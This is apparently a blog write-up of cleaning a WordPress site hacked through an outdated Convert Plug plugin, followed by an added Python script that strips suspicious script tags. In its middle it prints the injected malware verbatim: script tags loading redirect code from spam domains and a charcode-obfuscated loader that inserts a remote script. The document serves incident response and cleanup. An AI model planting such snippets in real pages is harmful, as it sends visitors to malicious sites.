This site was using an old version of Convert Plug, which has a large security flaw allowing hackers to modify any files on the site. Unfortunately for this site, every single file was modified to add a redirect script that sends users to spam. Since I could not even log in to WordPress to start scanning and cleaning, the only option was to do a server-side scan to see what files were infected. Unfortunately, it showed that almost every single file on the site was infected, 1,788 in total.

Because of the severity of this hack, the only solution was to take apart the whole site and rebuild, but not all was lost. The first step is to reinstall the core files, then delete and reinstall all the plugins. Hopefully by this point the site won't redirect anymore; worst case, rename the plugins/themes folders so that they all become inactive. Plugins should keep their settings after a reinstall, so that's not too much of a headache. The last step is the theme: depending on how custom it is, you might be able to just throw a fresh copy on, but most likely not. This will involve scanning the files and manually removing all the hacked code. This can be tedious and very time consuming, but it's better than rebuilding the whole site.

Most of the hacks are JavaScript redirects:

<script type='text/javascript' src='https://slow.destinyfernandi.com/same.js'></script>
<script type='text/javascript' src='https://snippet.adsformarket.com/same.js'></script>
<script type='text/javascript' src='https://dl.gotosecond2.com/talk.js?track=r&subid=547'></script>
<script type='text/javascript' async src='https://db.deliverygoodstrategy.com/js.min.js?s=p&'></script>
<script type='text/javascript' async src='https://css.developmyredflag.top/sjquery.min.js?style=prime&'></script>

And we also have some backdoors:

<script type='text/javascript' async=true>var fgjkghkj4 = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 100, 101, 108, 105, 118, 101, 114, 121, 103, 111, 111, 100, 115, 116, 114, 97, 116, 101, 103, 121, 46, 99, 111, 109, 47);
s.src=pl+'/js.min.js?s=r&'; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}</script>

After trying to remove all the malware manually, the site was still redirecting, so I put Wordfence on to see if it could find and remove anything I missed that might be causing the redirect. As of now the site is still down and the scan is running.

After the scan was complete and all the extra, unnecessary and hacked files were removed or restored, the scan reported that pages have broken links on them. After trying to edit a page and getting redirected myself, I had to turn off JavaScript to see the pages, and then I found the script. The only solution for this was to manually go through each page and remove them.

After cleaning the pages, the scan showed all the posts have it as well. The custom post types did not show up, but I will check them as well. As suspected, all custom post type pages also have the script on them.
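
The page-by-page cleanup described above can be scripted once the post content is exported. The following is an added example, not code from the original post: it strips `<script>` blocks that reach hosts outside an allowlist, unwrapping `String.fromCharCode` layers like the loader shown earlier first, and it goes slightly beyond the post by handling nested layers. `ALLOWED_HOSTS`, the function names and the sample content are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts this site legitimately loads scripts from (constructed).
ALLOWED_HOSTS = {"www.example.org"}

SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*['"]?([^'"\s>]+)""", re.I)
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""", re.I)
CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")

def decode_charcodes(js):
    """Expand String.fromCharCode(...) calls repeatedly so nested layers unwrap."""
    def expand(m):
        codes = [int(n) for n in re.findall(r"\d+", m.group(1))]
        return '"' + "".join(chr(c) for c in codes if c < 0x110000) + '"'
    prev = None
    while prev != js:  # each pass shrinks the text, so this terminates
        prev, js = js, CHARCODE_RE.sub(expand, js)
    return js

def _host(url):
    try:
        return urlparse(url).hostname  # None for relative paths
    except ValueError:
        return None

def suspicious_hosts(script):
    """Hosts a <script> block references that are not on the allowlist."""
    text = decode_charcodes(script)
    hosts = {_host(u) for u in URL_RE.findall(text) + SRC_RE.findall(text)}
    return {h for h in hosts if h and h not in ALLOWED_HOSTS}

def clean_post(html):
    """Return (html without scripts that reach unknown hosts, hosts removed)."""
    removed = set()
    def repl(m):
        bad = suspicious_hosts(m.group(0))
        removed.update(bad)
        return "" if bad else m.group(0)
    return SCRIPT_RE.sub(repl, html), sorted(removed)

def _codes(s):  # builds the constructed obfuscated samples below
    return ", ".join(str(ord(c)) for c in s)

INNER = "var pl = String.fromCharCode(%s); s.src = pl + '/x.js';" % _codes("https://bad.example")
SAMPLE = "".join([  # constructed post content, not taken from the site
    "<p>Hello</p>",
    "<script src='https://cdn.bad.example/same.js'></script>",
    "<script>eval(String.fromCharCode(%s));</script>" % _codes(INNER),
    "<script src='/wp-includes/js/jquery/jquery.min.js'></script>",
])
```

Run `clean_post` over a database export or staging copy first and review the list of removed hosts before writing anything back to pages, posts and custom post types.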
